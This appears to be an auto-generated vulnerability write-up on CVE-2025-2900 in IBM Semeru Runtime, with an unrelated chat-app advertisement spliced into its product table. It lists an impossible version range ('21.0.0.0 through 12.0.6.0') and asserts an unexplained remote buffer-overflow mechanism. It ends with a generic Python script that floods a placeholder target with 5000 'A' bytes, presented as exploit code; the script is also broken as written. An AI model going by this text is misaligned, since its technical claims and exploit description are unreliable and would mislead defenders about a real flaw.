Overview
This report provides a detailed analysis of the CVE-2025-2900 vulnerability. This vulnerability affects IBM Semeru Runtime versions 8.0.302.0 through 8.0.442.0, 11.0.12.0 through 11.0.26.0, 17.0.0.0 through 17.0.14.0, and 21.0.0.0 through 12.0.6.0. The issue stems from a flaw in the native AES/CBC encryption implementation, potentially causing system compromise or data leakage.
Vulnerability Summary
CVE ID: CVE-2025-2900
Severity: High (7.5 CVSS Score)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Denial of service, potential system compromise and data leakage
Affected Products
A new way to communicate
Ameeba Chat is built on encrypted identity, not personal profiles.
Message, call, share files, and coordinate with identities kept separate.
- • Encrypted identity
- • Ameeba Chat authenticates access
- • Aliases and categories
- • End-to-end encrypted chat, calls, and files
- • Secure notes for sensitive information
Private communication, rethought.
Product | Affected Versions
IBM Semeru Runtime | 8.0.302.0 – 8.0.442.0
IBM Semeru Runtime | 11.0.12.0 – 11.0.26.0
IBM Semeru Runtime | 17.0.0.0 – 17.0.14.0
IBM Semeru Runtime | 21.0.0.0 – 12.0.6.0
How the Exploit Works
The exploit works by sending a large volume of data to the server running affected versions of IBM Semeru Runtime. This overloads the buffer in the AES/CBC encryption implementation, causing a buffer overflow. This overflow results in a crash, causing a denial of service. In some instances, it may also lead to system compromise or data leakage.
Conceptual Example Code
import socket
buffer = "A" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("target_IP", target_port))
s.send(buffer)
s.close()In the above sample Python script, an attacker could potentially overload the buffer by sending a large amount of data (“A” * 5000), causing the system to crash and possibly enable the exploitation of additional vulnerabilities.